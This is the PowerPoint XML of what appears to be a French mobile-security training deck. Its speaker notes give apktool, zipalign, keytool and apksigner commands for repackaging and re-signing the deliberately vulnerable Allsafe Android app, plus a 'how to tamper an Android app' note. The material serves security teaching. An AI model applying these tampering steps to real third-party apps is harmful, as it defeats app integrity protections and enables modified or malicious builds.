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6"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId197"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="1573" r:id="rId3"/>
    <p:sldId id="1180" r:id="rId4"/>
    <p:sldId id="1190" r:id="rId5"/>
    <p:sldId id="1273" r:id="rId6"/>
    <p:sldId id="1183" r:id="rId7"/>
    <p:sldId id="1196" r:id="rId8"/>
    <p:sldId id="1207" r:id="rId9"/>
    <p:sldId id="1173" r:id="rId10"/>
    <p:sldId id="1574" r:id="rId11"/>
    <p:sldId id="1274" r:id="rId12"/>
    <p:sldId id="1275" r:id="rId13"/>
    <p:sldId id="1255" r:id="rId14"/>
    <p:sldId id="1212" r:id="rId15"/>
    <p:sldId id="1214" r:id="rId16"/>
    <p:sldId id="1633" r:id="rId17"/>
    <p:sldId id="1632" r:id="rId18"/>
    <p:sldId id="1215" r:id="rId19"/>
    <p:sldId id="1216" r:id="rId20"/>
    <p:sldId id="1218" r:id="rId21"/>
    <p:sldId id="1219" r:id="rId22"/>
    <p:sldId id="1232" r:id="rId23"/>
    <p:sldId id="1202" r:id="rId24"/>
    <p:sldId id="1203" r:id="rId25"/>
    <p:sldId id="1543" r:id="rId26"/>
    <p:sldId id="1544" r:id="rId27"/>
    <p:sldId id="1233" r:id="rId28"/>
    <p:sldId id="1235" r:id="rId29"/>
    <p:sldId id="1575" r:id="rId30"/>
    <p:sldId id="1236" r:id="rId31"/>
    <p:sldId id="1239" r:id="rId32"/>
    <p:sldId id="1240" r:id="rId33"/>
    <p:sldId id="1241" r:id="rId34"/>
    <p:sldId id="1545" r:id="rId35"/>
    <p:sldId id="1283" r:id="rId36"/>
    <p:sldId id="1242" r:id="rId37"/>
    <p:sldId id="1244" r:id="rId38"/>
    <p:sldId id="1245" r:id="rId39"/>
    <p:sldId id="1250" r:id="rId40"/>
    <p:sldId id="1247" r:id="rId41"/>
    <p:sldId id="1625" r:id="rId42"/>
    <p:sldId id="1257" r:id="rId43"/>
    <p:sldId id="1427" r:id="rId44"/>
    <p:sldId id="1428" r:id="rId45"/>
    <p:sldId id="1289" r:id="rId46"/>
    <p:sldId id="1540" r:id="rId47"/>
    <p:sldId id="1297" r:id="rId48"/>
    <p:sldId id="1556" r:id="rId49"/>
    <p:sldId id="1286" r:id="rId50"/>
    <p:sldId id="1303" r:id="rId51"/>
    <p:sldId id="1287" r:id="rId52"/>
    <p:sldId id="1348" r:id="rId53"/>
    <p:sldId id="1353" r:id="rId54"/>
    <p:sldId id="1561" r:id="rId55"/>
    <p:sldId id="1631" r:id="rId56"/>
    <p:sldId id="1470" r:id="rId57"/>
    <p:sldId id="1461" r:id="rId58"/>
    <p:sldId id="1309" r:id="rId59"/>
    <p:sldId id="1576" r:id="rId60"/>
    <p:sldId id="1310" r:id="rId61"/>
    <p:sldId id="1306" r:id="rId62"/>
    <p:sldId id="1481" r:id="rId63"/>
    <p:sldId id="1482" r:id="rId64"/>
    <p:sldId id="1577" r:id="rId65"/>
    <p:sldId id="1483" r:id="rId66"/>
    <p:sldId id="1484" r:id="rId67"/>
    <p:sldId id="1485" r:id="rId68"/>
    <p:sldId id="1486" r:id="rId69"/>
    <p:sldId id="1495" r:id="rId70"/>
    <p:sldId id="1487" r:id="rId71"/>
    <p:sldId id="1488" r:id="rId72"/>
    <p:sldId id="1489" r:id="rId73"/>
    <p:sldId id="1578" r:id="rId74"/>
    <p:sldId id="1305" r:id="rId75"/>
    <p:sldId id="1307" r:id="rId76"/>
    <p:sldId id="1496" r:id="rId77"/>
    <p:sldId id="1308" r:id="rId78"/>
    <p:sldId id="1493" r:id="rId79"/>
    <p:sldId id="1558" r:id="rId80"/>
    <p:sldId id="1627" r:id="rId81"/>
    <p:sldId id="1579" r:id="rId82"/>
    <p:sldId id="1369" r:id="rId83"/>
    <p:sldId id="1467" r:id="rId84"/>
    <p:sldId id="1580" r:id="rId85"/>
    <p:sldId id="1472" r:id="rId86"/>
    <p:sldId id="1374" r:id="rId87"/>
    <p:sldId id="1581" r:id="rId88"/>
    <p:sldId id="1375" r:id="rId89"/>
    <p:sldId id="1376" r:id="rId90"/>
    <p:sldId id="1316" r:id="rId91"/>
    <p:sldId id="1317" r:id="rId92"/>
    <p:sldId id="1584" r:id="rId93"/>
    <p:sldId id="1583" r:id="rId94"/>
    <p:sldId id="1582" r:id="rId95"/>
    <p:sldId id="1585" r:id="rId96"/>
    <p:sldId id="1586" r:id="rId97"/>
    <p:sldId id="1587" r:id="rId98"/>
    <p:sldId id="1588" r:id="rId99"/>
    <p:sldId id="1589" r:id="rId100"/>
    <p:sldId id="1590" r:id="rId101"/>
    <p:sldId id="1591" r:id="rId102"/>
    <p:sldId id="1592" r:id="rId103"/>
    <p:sldId id="1593" r:id="rId104"/>
    <p:sldId id="1594" r:id="rId105"/>
    <p:sldId id="1595" r:id="rId106"/>
    <p:sldId id="1596" r:id="rId107"/>
    <p:sldId id="1597" r:id="rId108"/>
    <p:sldId id="1598" r:id="rId109"/>
    <p:sldId id="1601" r:id="rId110"/>
    <p:sldId id="1600" r:id="rId111"/>
    <p:sldId id="1599" r:id="rId112"/>
    <p:sldId id="1602" r:id="rId113"/>
    <p:sldId id="1603" r:id="rId114"/>
    <p:sldId id="1604" r:id="rId115"/>
    <p:sldId id="1605" r:id="rId116"/>
    <p:sldId id="1606" r:id="rId117"/>
    <p:sldId id="1607" r:id="rId118"/>
    <p:sldId id="1608" r:id="rId119"/>
    <p:sldId id="1609" r:id="rId120"/>
    <p:sldId id="1610" r:id="rId121"/>
    <p:sldId id="1611" r:id="rId122"/>
    <p:sldId id="1612" r:id="rId123"/>
    <p:sldId id="1613" r:id="rId124"/>
    <p:sldId id="1614" r:id="rId125"/>
    <p:sldId id="1616" r:id="rId126"/>
    <p:sldId id="1292" r:id="rId127"/>
    <p:sldId id="1318" r:id="rId128"/>
    <p:sldId id="1420" r:id="rId129"/>
    <p:sldId id="1319" r:id="rId130"/>
    <p:sldId id="1422" r:id="rId131"/>
    <p:sldId id="1320" r:id="rId132"/>
    <p:sldId id="1408" r:id="rId133"/>
    <p:sldId id="1411" r:id="rId134"/>
    <p:sldId id="1624" r:id="rId135"/>
    <p:sldId id="1562" r:id="rId136"/>
    <p:sldId id="1628" r:id="rId137"/>
    <p:sldId id="1334" r:id="rId138"/>
    <p:sldId id="1479" r:id="rId139"/>
    <p:sldId id="1480" r:id="rId140"/>
    <p:sldId id="1618" r:id="rId141"/>
    <p:sldId id="1336" r:id="rId142"/>
    <p:sldId id="1621" r:id="rId143"/>
    <p:sldId id="1619" r:id="rId144"/>
    <p:sldId id="1620" r:id="rId145"/>
    <p:sldId id="1521" r:id="rId146"/>
    <p:sldId id="1622" r:id="rId147"/>
    <p:sldId id="1623" r:id="rId148"/>
    <p:sldId id="1522" r:id="rId149"/>
    <p:sldId id="1559" r:id="rId150"/>
    <p:sldId id="1293" r:id="rId151"/>
    <p:sldId id="1412" r:id="rId152"/>
    <p:sldId id="1346" r:id="rId153"/>
    <p:sldId id="1429" r:id="rId154"/>
    <p:sldId id="1547" r:id="rId155"/>
    <p:sldId id="1548" r:id="rId156"/>
    <p:sldId id="1294" r:id="rId157"/>
    <p:sldId id="1342" r:id="rId158"/>
    <p:sldId id="1497" r:id="rId159"/>
    <p:sldId id="1560" r:id="rId160"/>
    <p:sldId id="1563" r:id="rId161"/>
    <p:sldId id="1629" r:id="rId162"/>
    <p:sldId id="1465" r:id="rId163"/>
    <p:sldId id="1477" r:id="rId164"/>
    <p:sldId id="1478" r:id="rId165"/>
    <p:sldId id="1475" r:id="rId166"/>
    <p:sldId id="1506" r:id="rId167"/>
    <p:sldId id="1466" r:id="rId168"/>
    <p:sldId id="1424" r:id="rId169"/>
    <p:sldId id="1266" r:id="rId170"/>
    <p:sldId id="1295" r:id="rId171"/>
    <p:sldId id="1425" r:id="rId172"/>
    <p:sldId id="1426" r:id="rId173"/>
    <p:sldId id="1267" r:id="rId174"/>
    <p:sldId id="1300" r:id="rId175"/>
    <p:sldId id="1344" r:id="rId176"/>
    <p:sldId id="1352" r:id="rId177"/>
    <p:sldId id="1630" r:id="rId178"/>
    <p:sldId id="1509" r:id="rId179"/>
    <p:sldId id="1399" r:id="rId180"/>
    <p:sldId id="1516" r:id="rId181"/>
    <p:sldId id="1517" r:id="rId182"/>
    <p:sldId id="1400" r:id="rId183"/>
    <p:sldId id="1405" r:id="rId184"/>
    <p:sldId id="1402" r:id="rId185"/>
    <p:sldId id="1518" r:id="rId186"/>
    <p:sldId id="1301" r:id="rId187"/>
    <p:sldId id="1430" r:id="rId188"/>
    <p:sldId id="1431" r:id="rId189"/>
    <p:sldId id="1351" r:id="rId190"/>
    <p:sldId id="1498" r:id="rId191"/>
    <p:sldId id="1549" r:id="rId192"/>
    <p:sldId id="1626" r:id="rId193"/>
    <p:sldId id="1572" r:id="rId194"/>
    <p:sldId id="1570" r:id="rId195"/>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essamad" initials="A" lastIdx="1" clrIdx="0">
    <p:extLst>
      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="1be686b27a24b6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B0D"/>
    <a:srgbClr val="E0DFE1"/>
    <a:srgbClr val="F8F6F8"/>
    <a:srgbClr val="010101"/>
    <a:srgbClr val="FFFFFF"/>
    <a:srgbClr val="F2F2F2"/>
    <a:srgbClr val="B99A3A"/>
    <a:srgbClr val="A25F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4" autoAdjust="0"/>
    <p:restoredTop sz="91463" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr>
        <p:scale>
          <a:sx n="151" d="100"/>
          <a:sy n="151" d="100"/>
        </p:scale>
        <p:origin x="144" y="1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5770"/>
    </p:cViewPr>
  </p:sorterViewPr>
  <p:notesViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="111" d="100"/>
          <a:sy n="111" d="100"/>
        </p:scale>
        <p:origin x="4104"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commentAuthors" Target="commentAuthors.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9852A1-D924-4B5A-814B-5C0C5C5693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EF4D1A9E-A60F-4166-BCC8-E4B4F55521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3D184B-4A8A-46E0-B3E0-16A3C28470E4}" type="datetimeFigureOut">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>07/09/2022</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5A28C9F-035A-44DF-883F-F80A9B1927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F2A5DBC5-F323-469A-9B6D-92A35ABF1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E2CD99-9DFD-45B7-826B-252A6BD870E6}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38716718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90795B-9125-024B-9F25-10066B456EC2}" type="datetimeFigureOut">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>07/09/2022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436DC-B77F-0C4B-A4DD-0F6176318E19}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2923262882"/>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eloper.android.com/training/safetynet/attestati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eveloper.android.com/studio/command-line/apksigner"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prateek147/DVIA-v2/blob/master/DVIA-v2/DVIA-v2/Info.plist"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en.wikipedia.org/wiki/Realm_(database)"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Ajouter la</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0"/>
              <a:t> partie </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" err="1"/>
              <a:t>remediation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" baseline="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Safetynet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" u="sng" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://developer.android.com/training/safetynet/attestation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" kern="1200">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="131835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40235563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Extraire</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0"/>
              <a:t> les autres commandes en txt</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38067397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8044780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41759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4054195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mobsecguys.medium.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/smali-assembler-for-dalvik-e37c8eed22f9</a:t>
            </a:r>
            <a:endParaRPr lang="en-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22448770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apktool b -use-aapt2 -f </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" err="1"/>
              <a:t>allsafe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t> -o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" err="1"/>
              <a:t>allsafe-new.apk</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>https://developer.android.com/studio/command-line/zipalign</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" err="1"/>
              <a:t>zipalign</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t> -p 4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" err="1"/>
              <a:t>allsafe-new.apk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" err="1"/>
              <a:t>allsafe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>-new-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" err="1"/>
              <a:t>aligned.apk</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>=&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="BF360C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>If you use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" u="sng" err="1">
                <a:solidFill>
                  <a:srgbClr val="BF360C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>apksigner</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="BF360C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="BF360C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>zipalign</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="BF360C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> must only be performed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="BF360C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>before</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="BF360C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> the APK file has been signed. If you sign your APK using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="BF360C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>apksigner</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="BF360C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> and make further changes to the APK, its signature is invalidated.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" err="1"/>
              <a:t>keytool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" err="1"/>
              <a:t>genkeypair</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" err="1"/>
              <a:t>dname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" err="1"/>
              <a:t>cn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>=John Doe, ou=Security, o=Mobile, c=FR" -alias pentest -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" err="1"/>
              <a:t>keystore</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" err="1"/>
              <a:t>keystore.jks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" err="1"/>
              <a:t>storepass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t> mobile -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" err="1"/>
              <a:t>validity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t> 20000 -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" err="1"/>
              <a:t>keyalg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t> RSA -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" err="1"/>
              <a:t>keysize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t> 2048</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>~/Android/Sdk/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" err="1"/>
              <a:t>build-tools</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>/30.0.2/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" err="1"/>
              <a:t>apksigner</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" err="1"/>
              <a:t>sign</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t> --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" err="1"/>
              <a:t>ks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" err="1"/>
              <a:t>keystore.jks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t> --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" err="1"/>
              <a:t>ks-pass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" err="1"/>
              <a:t>pass:mobile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" err="1"/>
              <a:t>allsafe-new.apk</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30582971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Compléter l’étape 5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23337923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000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="OpenSans-Regular"/>
              </a:rPr>
              <a:t>How to tamper an Android app with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="UbuntuMono-Regular"/>
              </a:rPr>
              <a:t>apktool</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="UbuntuMono-Regular"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="OpenSans-Regular"/>
              </a:rPr>
              <a:t>First, you need to decode the APK </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="OpenSans-Regular"/>
              </a:rPr>
              <a:t>Õle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="OpenSans-Regular"/>
              </a:rPr>
              <a:t> with the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="UbuntuMono-Bold"/>
              </a:rPr>
              <a:t>d </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="OpenSans-Regular"/>
              </a:rPr>
              <a:t>option</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>https://stackoverflow.com/a/23719727</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23648567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https://www.randorisec.fr/fr/client-side-validation/</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1100" i="1"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12975876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80315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40643735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Code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" err="1"/>
              <a:t>beautify</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11182128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9498414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8044526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6328113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0364774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7275686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4812167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8203322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a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40156473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 une image</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="344396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538280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128367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 la solution</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25191627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 la solution</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="405053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15524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97497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12414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93096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69508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40597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75429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638279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902970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Ajouter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0"/>
